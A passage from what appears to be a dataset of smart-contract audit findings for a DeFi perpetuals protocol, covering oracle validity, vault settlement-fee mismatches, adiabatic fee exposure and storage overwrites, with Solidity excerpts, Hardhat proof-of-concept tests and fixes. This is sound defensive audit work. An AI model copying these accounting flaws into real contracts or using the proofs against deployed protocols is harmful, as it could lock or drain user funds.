}\\nriskParameterMakerFee.linearFee = parse6decimal('0.005')\\nriskParameterMakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.makerFee = riskParameterMakerFee\\nconst riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\nriskParameterTakerFee.linearFee = parse6decimal('0.005')\\nriskParameterTakerFee.proportionalFee = parse6decimal('0.0025')\\nriskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\nriskParameter.takerFee = riskParameterTakerFee\\nawait market.connect(owner).updateRiskParameter(riskParameter)\\n\\ndsu.transferFrom.whenCalledWith(user.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, COLLATERAL.mul(1e12)).returns(true)\\n\\nsetupOracle('100', TIMESTAMP, TIMESTAMP + 100);\\n\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\nawait market\\n .connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, POSITION, 0, COLLATERAL, false);\\n\\nsetupOracle('100', TIMESTAMP + 100, TIMESTAMP + 200);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is commited at timestamp+200\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// oracle is not commited at timestamp+300\\nsetupOracle('100', TIMESTAMP + 200, TIMESTAMP + 400);\\nsetupOracleAt('0', false, TIMESTAMP + 300);\\nawait market\\n .connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, 0, false);\\n\\n// settle to see makerValue at all versions\\nsetupOracle('100', TIMESTAMP + 400, TIMESTAMP + 500);\\n\\nawait market.settle(user.address);\\nawait market.settle(userB.address);\\n\\nvar ver = await market.versions(TIMESTAMP + 200);\\nconsole.log(\"version 200: longValue: \" + ver.longValue + \" makerValue: \" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 300);\\nconsole.log(\"version 300: longValue: \" + ver.longValue + \" makerValue: \" + ver.makerValue);\\nvar ver = await market.versions(TIMESTAMP + 400);\\nconsole.log(\"version 400: longValue: \" + ver.longValue + \" makerValue: \" + ver.makerValue);\\n})\\n```\\n\\nConsole log:\\n```\\nversion 200: longValue: -318 makerValue: 285\\nversion 300: longValue: -100000637 makerValue: 100500571\\nversion 400: longValue: -637 makerValue: 571\\n```\\n\\nNotice, that fees are accumulated between versions 200 and 300, version 300 has huge pnl (because it's evaluated at price = 0), which then returns to normal at version 400, but no fees are accumulated between version 300 and 400 due to version 300 having `price = 0`.чKeep the price from the previous valid oracle version and use it instead of oracle version's one if oracle version's price == 0.чAll fees and funding are incorrectly calculated as 0 during any period when there are no non-empty orders (which will be substantially more than 50% of the time, more like 90% of the time). Since most fees and funding are received by makers as a compensation for their price risk, this means makers will lose all these under-calculated fees and will receive a lot less fees and funding than expected.ч```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n -Vault global shares and assets change will mismatch local shares and assets change during settlement due to incorrect `_withoutSettlementFeeGlobal` formulaчhighчEvery vault update, which involves change of position in the underlying markets, `settlementFee` is charged by the Market. Since many users can deposit and redeem during the same oracle version, this `settlementFee` is shared equally between all users of the same oracle version. However, there is an issue in that `settlementFee` is charged once both for deposits and redeems, however `_withoutSettlementFeeGlobal` subtracts `settlementFee` in full both for deposits and redeems, meaning that for global fee, it's basically subtracted twice (once for deposits, and another time for redeems). But for local fee, it's subtracted proportional to `checkpoint.orders`, with sum of fee subtracted equal to exactly `settlementFee` (once). This difference in global and local `settlementFee` calculations leads to inflated `shares` and `assets` added for user deposits (local state) compared to vault overall (global state).\\nHere is an easy scenario to demonstrate the issue:\\nSettlementFee = `$10`\\nUser1 deposits `$10` for oracle version `t = 100`\\nUser2 redeems `10 shares` (worth $10) for the same oracle version `t = 100` (checkpoint.orders = 2)\\nOnce the oracle version `t = 100` settles, we have the following: 4.1. Global deposits = `$10`, redeems = `$10` 4.2. Global deposits convert to `0 shares` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.3. Global redeems convert to `0 assets` (because `_withoutSettlementFeeGlobal(10)` applies `settlementFee` of `$10` in full, returning 10-10=0) 4.4. User1 deposit of `$10` converts to `5 shares` (because `_withoutSettlementFeeLocal(10)` applies `settlementFee` of `$5` (because there are 2 orders), returning 10-5=5) 4.5. User2 redeem of `10 shares` converts to `$5` (for the same reason)\\nFrom the example above it can be seen that:\\nUser1 receives 5 shares, but global vault shares didn't increase. Over time this difference will keep growing potentially leading to a situation where many user redeems will lead to 0 global shares, but many users will still have local shares which they will be unable to redeem due to underflow, thus losing funds.\\nUser2's assets which he can claim increase by $5, but global claimable assets didn't change, meaning User2 will be unable to claim assets due to underflow when trying to decrease global assets, leading to loss of funds for User2.\\nThe underflow in both cases will happen in `Vault._update` when trying to update global account:\\n```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\nчCalculate total orders to deposit and total orders to redeem (in addition to total orders overall). Then `settlementFee` should be multiplied by `deposit/orders` for `toGlobalShares` and by `redeems/orders` for `toGlobalAssets`. This weightening of `settlementFee` will make it in-line with local order weights.чAny time there are both deposits and redeems in the same oracle version, the users receive more (local) shares and assets than overall vault shares and assets increase (global). This mismatch causes:\\nSystematic increase of (sum of user shares - global shares), which can lead to bank run since the last users who try to redeem will be unable to do so due to underflow.\\nSystematic increase of (sum of user assets - global assets), which will lead to users being unable to claim their redeemed assets due to underflow.\\nThe total difference in local and global `shares+assets` equals to `settlementFee` per each oracle version with both deposits and redeems. This can add up to significant amounts (at `settlementFee` = $1 this can be $100-$1000 per day), meaning it will quickly become visible especially for point 2., because typically global claimable assets are at or near 0 most of the time, since users usually redeem and then immediately claim, thus any difference of global and local assets will quickly lead to users being unable to claim.ч```\\nfunction update(\\n Account memory self,\\n uint256 currentId,\\n UFixed6 assets,\\n UFixed6 shares,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.current = currentId;\\n // @audit global account will have less assets and shares than sum of local accounts\\n (self.assets, self.shares) = (self.assets.sub(assets), self.shares.sub(shares));\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n}\\n```\\n -Requested oracle versions, which have expired, must return this oracle version as invalid, but they return it as a normal version with previous version's price insteadчhighчEach market action requests a new oracle version which must be commited by the keepers. However, if keepers are unable to commit requested version's price (for example, no price is available at the time interval, network or keepers are down), then after a certain timeout this oracle version will be commited as invalid, using the previous valid version's price.\\nThe issue is that when this expired oracle version is used by the market (using oracle.at), the version returned will be valid (valid = true), because oracle returns version as invalid only if `price = 0`, but the `commit` function sets the previous version's price for these, thus it's not 0.\\nThis leads to market using invalid versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.\\nWhen requested oracle version is commited, but is expired (commited after a certain timeout), the price of the previous valid version is set to this expired oracle version:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nLater, `Market._processOrderGlobal` reads the oracle version using the `oracle.at`, invalidating the order if the version is invalid:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp);\\n\\n context.pending.global.sub(newOrder);\\n if (!oracleVersion.valid) newOrder.invalidate();\\n```\\n\\nHowever, expired oracle version will return `valid = true`, because this flag is only set to `false` if price = 0:\\n```\\nfunction at(uint256 timestamp) public view returns (OracleVersion memory oracleVersion) {\\n (oracleVersion.timestamp, oracleVersion.price) = (timestamp, _prices[timestamp]);\\n oracleVersion.valid = !oracleVersion.price.isZero(); // @audit <<< valid = false only if price = 0\\n}\\n```\\n\\nThis means that `_processOrderGlobal` will treat this expired oracle version as valid and won't invalidate the order.чAdd validity map along with the price map to `KeeperOracle` when recording commited price.чMarket uses invalid (expired) oracle versions as if they're valid, keeping the orders (instead of invalidating them), which is a broken core functionality and a security risk for the protocol.ч```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n } else {\\n // @audit previous valid version's price is set for expired version\\n _prices[version.timestamp] = _prices[_global.latestVersion]; \\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n -When vault's market weight is set to 0 to remove the market from the vault, vault's leverage in this market is immediately set to max leverage risking position liquidationчmediumчIf any market has to be removed from the vault, the only way to do this is via setting this market's weight to 0. The problem is that the first vault rebalance will immediately withdraw max possible collateral from this market, leaving vault's leverage at max possible leverage, risking the vault's position liquidation. This is especially dangerous if vault's position in this removed market can not be closed due to high skew, so min position is not 0, but the leverage will be at max possible value. As a result, vault depositors can lose funds due to liquidation of vault's position in this market.\\nWhen vault is rebalanced, each market's collateral is calculated as following:\\n```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n\\nFor removed markets (weight = 0), `marketCollateral` will be set to `marketContext.margin` (i.e. minimum valid collateral to have position at max leverage), `marketAssets` will be set to 0. But later the position will be adjusted in case minPosition is not 0:\\n```\\n target.position = marketAssets\\n .muldiv(marketContext.registration.leverage, marketContext.latestPrice.abs())\\n .max(marketContext.minPosition)\\n .min(marketContext.maxPosition);\\n```\\n\\nThis means that vault's position in the market with weight 0 will be at max leverage until liquidated or position can be closed.\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n console.log(\"pos1 = \" + (await position()) + \" pos2 = \" + (await btcPosition()) + \" col1 = \" + (await collateralInVault()) + \" col2 = \" + (await btcCollateralInVault()));\\n\\n // update weight\\n await vault.connect(owner).updateWeights([parse6decimal('1.0'), parse6decimal('0')])\\n\\n // do small withdrawal to trigger rebalance\\n await vault.connect(user).update(user.address, 0, smallDeposit, 0)\\n await updateOracle()\\n\\n console.log(\"pos1 = \" + (await position()) + \" pos2 = \" + (await btcPosition()) + \" col1 = \" + (await collateralInVault()) + \" col2 = \" + (await btcCollateralInVault()));\\n })\\n```\\n\\nConsole log:\\n```\\npos1 = 12224846 pos2 = 206187 col1 = 8008000000 col2 = 2002000000\\npos1 = 12224846 pos2 = 206187 col1 = 9209203452 col2 = 800796548\\n```\\n\\nNotice, that after rebalance, position in the removed market (pos2) is still the same, but the collateral (col2) reduced to minimum allowed.чEnsure that the market's collateral is based on leverage even if `weight = 0`чMarket removed from the vault (weight set to 0) is put at max leverage and has a high risk of being liquidated, thus losing vault depositors funds.ч```\\n marketCollateral = marketContext.margin\\n .add(collateral.sub(totalMargin).mul(marketContext.registration.weight));\\n\\n UFixed6 marketAssets = assets\\n .mul(marketContext.registration.weight)\\n .min(marketCollateral.mul(LEVERAGE_BUFFER));\\n```\\n -Makers can lose funds from price movement even when no long and short positions are opened, due to incorrect distribution of adiabatic fees exposure between makersчmediumчAdiabatic fees introduced in this new update of the protocol (v2.3) were introduced to solve the problem of adiabatic fees netting out to 0 in market token's rather than in USD terms. With the new versions, this problem is solved and adiabatic fees now net out to 0 in USD terms. However, they net out to 0 only for the whole makers pool, but each individual maker can have profit or loss from adiabatic fees at different price levels all else being equal. This creates unexpected risk of loss of funds from adiabatic fees for individual makers, which can be significant, up to several percents of the amount invested.\\nThe issue is demonstrated in the following scenario:\\n`price = 1`\\nAlice open `maker = 10` (collateral = +0.9 from adiabatic fee)\\nBob opens `maker = 10` (collateral = +0.7 from adiabatic fee)\\nPath A. `price = 1`. Bob closes (final collateral = +0), Alice closes (final collaterral = +0)\\nPath B. `price = 2`. Bob closes (final collateral = +0.1), Alice closes (final collaterral = -0.1)\\nPath C. `price = 0.5`. Bob closes (final collateral = -0.05), Alice closes (final collateral = +0.05)\\nNotice that both Alice and Bob are the only makers, there are 0 longs and 0 shorts, but still both Alice and Bob pnl depends on the market price due to pnl from adiabatic fees. Adiabatic fees net out to 0 for all makers aggregated (Alice + Bob), but not for individual makers. Individual makers pnl from adiabatic fees is more or less random depending on the other makers who have opened.\\nIf Alice were the only maker, then:\\nprice = 1\\nAlice opens `maker = 10` (collateral = +0.9)\\nprice = 2: exposure adjusted +0.9 (Alice collateral = +1.8)\\nAlice closes `maker = 10` (adiabatic fees = `-1.8`, Alice final collateral = 0)\\nFor the lone maker there is no such problem, final collateral is 0 regardless of price. The core of the issue lies in the fact that the maker's adiabatic fees exposure adjustment is weighted by makers open maker amount. So in the first example:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split evenly between Alice and Bob (+0.8 for each)\\nAlice new exposure = 0.9 + 0.8 = +1.7 (but adiabatic fees paid to close = -1.8)\\nBob new exposure = 0.7 + 0.8 = +1.5 (but adiabatic fees paid to close = -1.4)\\nIf maker exposure adjustment was weighted by individual makers exposure, then all is correct:\\nprice = 1. Alice `maker = 10, exposure = +0.9`, Bob `maker = 10, exposure = +0.7`\\nprice = 2. Total exposure is adjusted by +1.6, split 0.9:0.7 between Alice and Bob, e.g. +0.9 for Alice, +0.7 for Bob\\nAlice new exposure = 0.9 + 0.9 = +1.8 (adiabatic fees paid to close = -1.8, net out to 0)\\nBob new exposure = 0.7 + 0.7 = +1.4 (adiabatic fees paid to close = -1.4, net out to 0)\\nIn the worst case, in the example above, if Bob opens `maker = 40` (adiabatic fees scale = 50), then at `price = 2`, Alice's final collateral is `-0.4` due to adiabatic fees. Given that Alice's position is 10 at `price = 2` (notional = 20), a loss of `-0.4` is a loss of `-2%` at 1x leverage, which is quite significant.\\nThe scenario above is demonstrated in the test, change the following test in test/unit/market/Market.test.ts:\\n```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(\"user collateral = \" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(\"userB collateral = \" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(\"ver\" + ver + \": makerValue=\" + v.makerValue + \" longValue=\" + v.longValue + \\n \" makerPosFee=\" + v.makerPosFee + \" makerNegFee=\" + v.makerNegFee +\\n \" takerPosFee=\" + v.takerPosFee + \" takerNegFee=\" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n\\nConsole log:\\n```\\nuser collateral = 10000000000\\nuserB collateral = 0\\nver1636401093: makerValue=0 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000000000\\nver1636401193: makerValue=0 longValue=0 makerPosFee=9000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000090000\\nuserB collateral = 10000070000\\nver1636401293: makerValue=0 longValue=0 makerPosFee=7000 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000150000\\nver1636401393: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=0 takerPosFee=0 takerNegFee=0\\nuser collateral = 10000170000\\nuserB collateral = 10000010000\\nver1636401493: makerValue=8000 longValue=0 makerPosFee=0 makerNegFee=-14000 takerPosFee=0 takerNegFee=0\\nuser collateral = 9999990000\\nuserB collateral = 10000010000\\nver1636401593: makerValue=-5500 longValue=0 makerPosFee=0 makerNegFee=-4500 takerPosFee=0 takerNegFee=0\\n```\\n\\nNotice, that final user balance is -0.1 and final userB balance is +0.1чSplit the total maker exposure by individual maker's exposure rather than by their position size. To do this:\\nAdd another accumulator to track total `exposure`\\nAdd individual maker `exposure` to user's `Local` storage\\nWhen accumulating local storage in the checkpoint, account global accumulator `exposure` weighted by individual user's `exposure`.чIndividual makers bear an additional undocumented price risk due to adiabatic fees, which is quite significant (can be several percentages of the notional).ч```\\nit('adiabatic fee', async () => {\\n function setupOracle(price: string, timestamp : number, nextTimestamp : number) {\\n const oracleVersion = {\\n price: parse6decimal(price),\\n timestamp: timestamp,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, nextTimestamp])\\n oracle.request.returns()\\n }\\n\\n async function showInfo() {\\n await market.settle(user.address);\\n await market.settle(userB.address);\\n await market.settle(userC.address);\\n var sum : BigNumber = BigNumber.from('0');\\n var info = await market.locals(user.address);\\n console.log(\"user collateral = \" + info.collateral);\\n sum = sum.add(info.collateral);\\n var info = await market.locals(userB.address);\\n sum = sum.add(info.collateral);\\n console.log(\"userB collateral = \" + info.collateral);\\n var info = await market.locals(userC.address);\\n sum = sum.add(info.collateral);\\n }\\n\\n async function showVer(ver : number) {\\n var v = await market.versions(ver);\\n console.log(\"ver\" + ver + \": makerValue=\" + v.makerValue + \" longValue=\" + v.longValue + \\n \" makerPosFee=\" + v.makerPosFee + \" makerNegFee=\" + v.makerNegFee +\\n \" takerPosFee=\" + v.takerPosFee + \" takerNegFee=\" + v.takerNegFee\\n );\\n }\\n\\n const riskParameter = { // rest of code(await market.riskParameter()) }\\n const riskParameterMakerFee = { // rest of coderiskParameter.makerFee }\\n riskParameterMakerFee.linearFee = parse6decimal('0.00')\\n riskParameterMakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterMakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterMakerFee.scale = parse6decimal('50.0')\\n riskParameter.makerFee = riskParameterMakerFee\\n const riskParameterTakerFee = { // rest of coderiskParameter.takerFee }\\n riskParameterTakerFee.linearFee = parse6decimal('0.00')\\n riskParameterTakerFee.proportionalFee = parse6decimal('0.00')\\n riskParameterTakerFee.adiabaticFee = parse6decimal('0.01')\\n riskParameterTakerFee.scale = parse6decimal('50.0')\\n riskParameter.takerFee = riskParameterTakerFee\\n await market.connect(owner).updateRiskParameter(riskParameter)\\n\\n marketParameter = {\\n fundingFee: parse6decimal('0.0'),\\n interestFee: parse6decimal('0.0'),\\n oracleFee: parse6decimal('0.0'),\\n riskFee: parse6decimal('0.0'),\\n positionFee: parse6decimal('0.0'),\\n maxPendingGlobal: 5,\\n maxPendingLocal: 3,\\n settlementFee: 0,\\n makerCloseAlways: false,\\n takerCloseAlways: false,\\n closed: false,\\n settle: false,\\n }\\n await market.connect(owner).updateParameter(beneficiary.address, coordinator.address, marketParameter)\\n\\n var time = TIMESTAMP;\\n\\n setupOracle('1', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, POSITION, 0, 0, COLLATERAL, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('1', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(userB)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](userB.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('2', time, time + 100);\\n await market.connect(user)\\n ['update(address,uint256,uint256,uint256,int256,bool)'](user.address, 0, 0, 0, 0, false);\\n await showInfo()\\n await showVer(time)\\n\\n time += 100;\\n setupOracle('0.5', time, time + 100);\\n await showInfo()\\n await showVer(time)\\n})\\n```\\n -All transactions to claim assets from the vault will revert in some situations due to double subtraction of the claimed assets in market position allocations calculation.чmediumчWhen `assets` are claimed from the vault (Vault.update(0,0,x) called), the vault rebalances its collateral. There is an issue with market positions allocation calculations: the `assets` (\"total position\") subtract claimed amount twice. This leads to revert in case this incorrect `assets` amount is less than `minAssets` (caused by market's minPosition). In situations when the vault can't redeem due to some market's position being at the `minPosition` (because of the market's skew, which disallows makers to reduce their positions), this will lead to all users being unable to claim any `assets` which were already redeemed and settled.\\n`Vault.update` rebalances collateral by calling _manage:\\n```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n\\nIn the rebalance calculations, collateral and assets (assets here stands for \"total vault position\") are calculated as following:\\n```\\n UFixed6 collateral = UFixed6Lib.unsafeFrom(strategy.totalCollateral).add(deposit).unsafeSub(withdrawal);\\n UFixed6 assets = collateral.unsafeSub(ineligable);\\n\\n if (collateral.lt(strategy.totalMargin)) revert StrategyLibInsufficientCollateralError();\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\n`ineligable` is calculated as following:\\n```\\nfunction _ineligable(Context memory context, UFixed6 withdrawal) private pure returns (UFixed6) {\\n // assets eligable for redemption\\n UFixed6 redemptionEligable = UFixed6Lib.unsafeFrom(context.totalCollateral)\\n .unsafeSub(withdrawal)\\n .unsafeSub(context.global.assets)\\n .unsafeSub(context.global.deposit);\\n\\n return redemptionEligable\\n // approximate assets up for redemption\\n .mul(context.global.redemption.unsafeDiv(context.global.shares.add(context.global.redemption)))\\n // assets pending claim\\n .add(context.global.assets)\\n // assets withdrawing\\n .add(withdrawal);\\n}\\n```\\n\\nNotice that `ineligable` adds `withdrawal` in the end (which is the assets claimed by the user). Now back to collateral and assets calculation:\\n`collateral = totalCollateral + deposit - withdrawal`\\n`assets = collateral - ineligable = collateral - (redemptionEligable * redemption / (redemption + shares) + global.assets + withdrawal)`\\n`assets = totalCollateral + deposit - withdrawal - [redemptionIneligable] - global.assets - withdrawal`\\n`assets = totalCollateral + deposit - [redemptionIneligable] - global.assets - 2 * withdrawal`\\nSee that `withdrawal` (assets claimed by the user) is subtracted twice in assets calculations. This means that assets calculated are smaller than it should. In particular, assets might become less than minAssets thus reverting in the following line:\\n```\\n if (assets.lt(strategy.minAssets)) revert StrategyLibInsufficientAssetsError();\\n```\\n\\nPossible scenario for this issue to cause inability to claim funds:\\nSome vault market's has a high skew (|long - short|), which means that minimum maker position is limited by the skew.\\nUser redeems large amount from the vault, reducing vault's position in that market so that market maker ~= |long - short|. This means that further redeems from the vault are not possible because the vault can't reduce its position in the market.\\nAfter that, the user tries to claim what he has redeemed, but all attempts to redeem will revert (both for this user and for any other user that might want to claim)\\nThe scenario above is demonstrated in the test, change the following test in test/integration/vault/Vault.test.ts:\\n```\\n it('simple deposits and redemptions', async () => {\\n// rest of code\\n // Now we should have opened positions.\\n // The positions should be equal to (smallDeposit + largeDeposit) * leverage originalOraclePrice.\\n expect(await position()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).mul(4).div(5).div(originalOraclePrice),\\n )\\n expect(await btcPosition()).to.equal(\\n smallDeposit.add(largeDeposit).mul(leverage).div(5).div(btcOriginalOraclePrice),\\n )\\n\\n /*** remove all lines after this and replace with the following code: ***/\\n\\n var half = smallDeposit.add(largeDeposit).div(2).add(smallDeposit);\\n await vault.connect(user).update(user.address, 0, half, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).update(user2.address, smallDeposit, 0, 0) // this will create min position in the market\\n await vault.connect(user).update(user.address, 0, 0, half) // this will revert even though it's just claiming\\n })\\n```\\n\\nThe last line in the test will revert, even though it's just claiming assets. If the pre-last line is commented out (no \"min position\" created in the market), it will work normally.чRemove `add(withdrawal)` from `_ineligable` calculation in the vault.чIn certain situations (redeem not possible from the vault due to high skew in some underlying market) claiming assets from the vault will revert for all users, temporarily (and sometimes permanently) locking user funds in the contract.ч```\\n_manage(context, depositAssets, claimAmount, !depositAssets.isZero() || !redeemShares.isZero());\\n```\\n -If referral or liquidator is the same address as the account, then liquidation/referral fees will be lost due to local storage being overwritten after the `claimable` amount is credited to liquidator or referralчmediumчAny user (address) can be liquidator and/or referral, including account's own address (the user can self-liquidate or self-refer). During the market settlement, liquidator and referral fees are credited to liquidator/referral's `local.claimable` storage. The issue is that the account's local storage is held in the memory during the settlement process, and is saved into storage after settlement/update. This means that `local.claimable` storage changes for the account are not reflected in the in-memory cached copy and discarded when the cached copy is saved after settlement.\\nThis leads to liquidator and referral fees being lost when these are the account's own address.\\nDuring market account settlement process, in the `_processOrderLocal`, liquidator and referral fees are credited to corresponding accounts via:\\n```\\n// rest of code\\n _credit(liquidators[account][newOrderId], accumulationResult.liquidationFee);\\n _credit(referrers[account][newOrderId], accumulationResult.subtractiveFee);\\n// rest of code\\nfunction _credit(address account, UFixed6 amount) private {\\n if (amount.isZero()) return;\\n\\n Local memory newLocal = _locals[account].read();\\n newLocal.credit(amount);\\n _locals[account].store(newLocal);\\n}\\n```\\n\\nHowever, for the account the cached copy of `_locals[account]` is stored after the settlement in _storeContext:\\n```\\nfunction _storeContext(Context memory context, address account) private {\\n // state\\n _global.store(context.global);\\n _locals[account].store(context.local);\\n// rest of code\\n```\\n\\nThe order of these actions is:\\n```\\nfunction settle(address account) external nonReentrant whenNotPaused {\\n Context memory context = _loadContext(account);\\n\\n _settle(context, account);\\n\\n _storeContext(context, account);\\n}\\n```\\n\\nLoad `_locals[account]` into memory (context.local)\\nSettle: during settlement `_locals[account].claimable` is increased for liquidator and referral. Note: this is not reflected in `context.local`\\nStore cached context: `_locals[account]` is overwritten with the `context.local`, losing `claimable` increased during 